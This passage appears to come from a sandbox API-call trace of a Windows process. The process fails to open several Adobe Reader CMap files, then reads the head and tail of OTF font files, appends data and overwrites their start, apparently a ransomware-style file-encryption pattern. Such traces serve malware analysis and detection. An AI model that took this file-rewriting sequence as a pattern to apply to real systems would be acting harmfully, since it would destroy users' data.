10.0\\Resource\\CMap\\ETenms-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\etenms-b5-v")) returned 0x20 [0096.853] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GB-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gb-euc-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.853] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GB-EUC-V", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GB-EUC-V", lpFilePart=0x2fdf690*="GB-EUC-V") returned 0x3f [0096.853] GetLastError () returned 0x5 [0096.853] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.853] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.854] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.854] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.854] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.854] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.854] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GB-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gb-euc-v")) returned 0x20 [0096.855] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.855] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-H", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-H", lpFilePart=0x2fdf690*="GBpc-EUC-H") returned 0x41 [0096.855] GetLastError () returned 0x5 [0096.855] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.855] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.855] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.856] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.856] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.856] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.856] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-h")) returned 0x20 [0096.856] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdla-b5-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.856] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-V", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-V", lpFilePart=0x2fdf690*="HKdla-B5-V") returned 0x41 [0096.856] GetLastError () returned 0x5 [0096.856] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.856] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.857] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.857] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.857] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.857] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.857] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdla-b5-v")) returned 0x20 [0096.857] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm471-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm471-b5-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.857] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm471-B5-V", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm471-B5-V", lpFilePart=0x2fdf690*="HKm471-B5-V") returned 0x42 [0096.857] GetLastError () returned 0x5 [0096.858] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.858] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.858] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.858] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.858] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.858] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.858] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm471-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm471-b5-v")) returned 0x20 [0096.858] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-HW-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-hw-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.859] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-HW-H", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-HW-H", lpFilePart=0x2fdf690*="KSCms-UHC-HW-H") returned 0x45 [0096.859] GetLastError () returned 0x5 [0096.859] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.859] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.859] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.859] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.859] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.866] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.866] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-HW-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-hw-h")) returned 0x20 [0096.866] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-90pv-RKSJ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-90pv-rksj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.866] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-90pv-RKSJ", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-90pv-RKSJ", lpFilePart=0x2fdf690*="UCS2-90pv-RKSJ") returned 0x45 [0096.866] GetLastError () returned 0x5 [0096.866] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.866] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.866] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.866] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.867] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.867] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.867] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-90pv-RKSJ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-90pv-rksj")) returned 0x20 [0096.867] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UCS2-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-ucs2-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.867] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UCS2-V", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UCS2-V", lpFilePart=0x2fdf690*="UniCNS-UCS2-V") returned 0x44 [0096.867] GetLastError () returned 0x5 [0096.868] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.868] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.868] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.868] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.868] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.868] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.868] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UCS2-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-ucs2-v")) returned 0x20 [0096.868] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-HW-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-hw-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.868] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-HW-H", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-HW-H", lpFilePart=0x2fdf690*="UniJIS-UCS2-HW-H") returned 0x47 [0096.869] GetLastError () returned 0x5 [0096.869] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.869] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.869] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.869] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.869] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.869] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.869] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-HW-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-hw-h")) returned 0x20 [0096.869] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UCS2-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-ucs2-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.870] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UCS2-V", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UCS2-V", lpFilePart=0x2fdf690*="UniKS-UCS2-V") returned 0x43 [0096.870] GetLastError () returned 0x5 [0096.870] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.870] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.870] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.870] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.870] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.870] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.870] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UCS2-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-ucs2-v")) returned 0x20 [0096.870] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-bold.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0096.871] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0096.871] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x10e4c [0096.871] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0096.871] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.872] ReleaseMutex (hMutex=0x168) returned 1 [0096.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeHebrew-Bold.otf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0096.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeHebrew-Bold.otf", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeHebrew-Bold.otf", lpUsedDefaultChar=0x0) returned 20 [0096.872] ReadFile (in: hFile=0x1d4, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0096.873] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xfe4c [0096.873] ReadFile (in: hFile=0x1d4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0096.876] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xfe4c [0096.876] WriteFile (in: hFile=0x1d4, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.877] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0096.877] WriteFile (in: hFile=0x1d4, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0096.877] CloseHandle (hObject=0x1d4) returned 1 [0096.877] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-regular.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0096.878] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0096.878] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x10530 [0096.878] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0096.878] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.878] ReleaseMutex (hMutex=0x168) returned 1 [0096.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeThai-Regular.otf", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeThai-Regular.otf", cchWideChar=21, lpMultiByteStr=0x1f88b2c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeThai-Regular.otf", lpUsedDefaultChar=0x0) returned 21 [0096.878] ReadFile (in: hFile=0x1d4, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0096.916] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xf530 [0096.916] ReadFile (in: hFile=0x1d4, lpBuffer=0x26956e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0096.931] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xf530 [0096.931] WriteFile (in: hFile=0x1d4, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.932] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0096.932] WriteFile (in: hFile=0x1d4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0096.932] CloseHandle (hObject=0x1d4) returned 1 [0096.932] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-regular.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0096.933] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0096.933] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x38790 [0096.933] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0096.933] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.933] ReleaseMutex (hMutex=0x168) returned 1 [0096.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MinionPro-Regular.otf", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MinionPro-Regular.otf", cchWideChar=21, lpMultiByteStr=0x1f88b2c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MinionPro-Regular.otf", lpUsedDefaultChar=0x0) returned 21 [0096.933] ReadFile (in: hFile=0x1d4, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0096.950] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x37790 [0096.950] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0096.960] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) 